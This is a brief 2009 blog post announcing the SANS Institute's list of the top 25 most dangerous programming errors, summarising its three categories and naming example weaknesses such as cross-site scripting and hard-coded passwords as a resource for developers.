Sunday, January 25, 2009
The SANS Institute recently released the list of the top 25 worst programming errors. This list is prepared by experts from more than 30 US and international cyber security organizations, which includes Symantec, Microsoft, DHS's National Cyber Security Division among others. It enumerates the most dangerous programming mistakes that lead to critical security vulnerabilities.
This list is a great read for people involved in software design and development. It not only provides the vulnerabilities caused by these errors, but also provides design and implementation guidelines to prevent these errors. It also provides solutions to rectify these errors. Developers can use these fairly extensive prevention and remediation steps to mitigate or eliminate weakness in their systems.
The composition is organized in three categories - Insecure Interaction Between Components (9 errors), Risky Resource Management (9 errors) and Porous Defenses (7 errors). Insecure Interaction Between Components includes errors like 'Improper Input Validations' giving attackers a gateway to your application; 'Cross-Site Scripting (XSS)' which can allow an attacker to steal information by using user vulnerabilities. Risky Resource Management identifies vulnerabilities caused due to 'External Control of Critical State Data'; 'Untrusted Search Path' for resources; etc. The Porous Defenses enumerates improper use defensive techniques such as 'Improper Access Control', 'Hard-Coded Password' among others.
The online version of the list is available out here. You can also download the pdf version of the document.